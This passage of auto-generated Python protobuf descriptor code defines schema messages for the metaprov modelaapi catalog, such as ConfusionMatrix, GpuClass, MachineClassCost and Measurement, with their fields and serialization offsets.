_descriptor.FieldDescriptor(
name='enable', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CompilerSpec.enable', index=0,
number=1, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='compiler', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CompilerSpec.compiler', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='targets', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CompilerSpec.targets', index=2,
number=3, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2212,
serialized_end=2277,
)
_CONFUSIONMATRIX = _descriptor.Descriptor(
name='ConfusionMatrix',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrix',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='rows', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrix.rows', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2279,
serialized_end=2387,
)
_CONFUSIONMATRIXROW = _descriptor.Descriptor(
name='ConfusionMatrixRow',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrixRow',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='t', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrixRow.t', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='p', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrixRow.p', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='count', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrixRow.count', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pct', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrixRow.pct', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2389,
serialized_end=2459,
)
_CURVEPOINT = _descriptor.Descriptor(
name='CurvePoint',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CurvePoint',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CurvePoint.x', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CurvePoint.y', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2461,
serialized_end=2495,
)
_DATACENTER = _descriptor.Descriptor(
name='DataCenter',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.DataCenter',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.DataCenter.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='code', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.DataCenter.code', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2497,
serialized_end=2537,
)
_FLOATPARAMETER = _descriptor.Descriptor(
name='FloatParameter',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.FloatParameter',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.FloatParameter.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='min', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.FloatParameter.min', index=1,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.FloatParameter.max', index=2,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='defaultValue', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.FloatParameter.defaultValue', index=3,
number=5, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.FloatParameter.log', index=4,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2539,
serialized_end=2630,
)
_GITHUBEVENTS = _descriptor.Descriptor(
name='GithubEvents',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GithubEvents',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='gitConnectionName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GithubEvents.gitConnectionName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='repository', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GithubEvents.repository', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='branch', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GithubEvents.branch', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='blobNameRegex', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GithubEvents.blobNameRegex', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='events', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GithubEvents.events', index=4,
number=5, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2632,
serialized_end=2748,
)
_GPUCLASS = _descriptor.Descriptor(
name='GpuClass',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClass',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClass.code', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='regionName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClass.regionName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vcpu', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClass.vcpu', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='gpumem', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClass.gpumem', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2750,
serialized_end=2872,
)
_GPUCLASSCOST = _descriptor.Descriptor(
name='GpuClassCost',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClassCost',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClassCost.code', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='region', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClassCost.region', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='costPerMinute', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClassCost.costPerMinute', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='costSpot', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClassCost.costSpot', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2875,
serialized_end=3056,
)
_INTPARAMETER = _descriptor.Descriptor(
name='IntParameter',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.IntParameter',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.IntParameter.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='type', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.IntParameter.type', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='min', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.IntParameter.min', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.IntParameter.max', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='defaultValue', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.IntParameter.defaultValue', index=4,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=3058,
serialized_end=3148,
)
_LIB = _descriptor.Descriptor(
name='Lib',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Lib',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='frameworks', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Lib.frameworks', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Lib.version', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=3150,
serialized_end=3192,
)
_LOGS = _descriptor.Descriptor(
name='Logs',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Logs',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='bucketName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Logs.bucketName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='paths', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Logs.paths', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=3194,
serialized_end=3235,
)
_MLFRAMEWORK = _descriptor.Descriptor(
name='MLFramework',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFramework',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFramework.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='spec', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFramework.spec', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=3238,
serialized_end=3407,
)
_MLFRAMEWORKLIST = _descriptor.Descriptor(
name='MLFrameworkList',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkList.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='items', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkList.items', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=3410,
serialized_end=3578,
)
_MLFRAMEWORKSPEC = _descriptor.Descriptor(
name='MLFrameworkSpec',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='url', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkSpec.url', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='description', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkSpec.description', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkSpec.version', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lang', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkSpec.lang', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=3580,
serialized_end=3662,
)
_MACHINECLASS = _descriptor.Descriptor(
name='MachineClass',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClass',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClass.code', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='regionName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClass.regionName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='mem', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClass.mem', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vcpu', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClass.vcpu', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='storage', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClass.storage', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=3665,
serialized_end=3805,
)
_MACHINECLASSCOST = _descriptor.Descriptor(
name='MachineClassCost',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClassCost',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClassCost.code', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='region', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClassCost.region', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='costPerMinute', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClassCost.costPerMinute', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='costSpot', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClassCost.costSpot', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=3808,
serialized_end=3993,
)
_MEASUREMENT = _descriptor.Descriptor(
name='Measurement',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Measurement',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metric', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Measurement.metric', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Measurement.value', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=3995,
serialized_end=4039,
)
_MODELDEPLOYMENTSPEC = _descriptor.Descriptor(
name='ModelDeploymentSpec',
